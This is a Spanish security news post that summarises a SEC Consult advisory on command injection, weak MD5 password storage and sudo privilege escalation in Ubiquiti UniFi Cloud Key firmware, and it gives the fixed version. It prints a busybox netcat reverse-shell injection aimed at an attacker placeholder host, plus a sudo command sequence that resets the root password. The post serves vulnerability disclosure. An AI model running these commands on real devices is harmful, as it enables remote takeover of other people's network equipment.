sábado, 29 de julio de 2017

Múltiples vulnerabilidades críticas en Ubiquiti Networks UniFi Cloud Key

Se han revelado varias vulnerabilidades críticas en los dispositivos Ubiquiti Networks UniFi Cloud Key que podrían permitir la inyección de comandos, la obtención de la contraseña del usuario y elevar privilegios.



La primera de las vulnerabilidades se encuentra en el fichero ‘api.incy podría permitir una inyección de comandos a través del envío a la víctima de un enlace de actualización para el firmware de UniFi Cloud Key especialmente manipulado. Así sería posible utilizar una shell inversa para obtener acceso al dispositivo.

;busybox nc <IP-Origen> <Puerto-Origen> -e /bin/bash;
http://enlace-utilizado-para-ocultar-el-comando-en-la-ventana-de-actualizacion


En este punto se podría obtener la contraseña del usuario debido a un segundo fallo de seguridad: el fichero ‘system.cfgalmacena los nombres de usuario y hashes MD5 de las contraseñas, los cuales se podrían romper en un tiempo razonable. Y, aunque el usuario de la interfaz web ‘www-data’ tiene permisos limitados de acceso y ejecución, sí puede leer dicho archivo de configuración.

Una vez obtenida la contraseña del usuario, sería posible modificar la configuración de la red inalámbrica.

Además existe una tercera vulnerabilidad que podría permitir secuestrar al usuario ‘root’ y elevar privilegios en el dispositivo. El fallo, ubicado en el fichero ‘/etc/sudoers.d/cloudkey-webui’, consiste en que algunos binarios permiten la ejecución a través de "sudo" sin solicitar la contraseña de ‘root’. De tal forma que la contraseña del usuario "rootpuede ser modificada por el usuario ‘www-data’ a pesar de tener permisos limitados a mediante el binario ‘ubnt-systool’. Ejemplo:

$ cd /tmp
$ echo "root:password" > file.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < file.txt




Aunque estos errores fueron descubiertos el pasado mes de Febrero por SEC Consult, la información no ha sido revelada hasta el momento para permitir una ventana temporal suficiente tanto para que el fabricante liberase una solución como para que los usuarios pudiesen actualizar sus dispositivos.

Se ha comprobado que las versiones 0.5.9 y 0.6.0, y potencialmente versiones anteriores, de Ubiquiti Networks UniFi Cloud Key son vulnerables. Para solucionar estos problemas es necesario instalar la actualización del firmware v0.6.1 o superior.


Más información:
Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170727-0_Ubiquiti_Networks_UniFi_Cloud_Key_Multiple_Critical_Vulnerabilities_v10.txt

UniFi Cloud Key firmware download
https://www.ubnt.com/download/unifi

Juan José Ruíz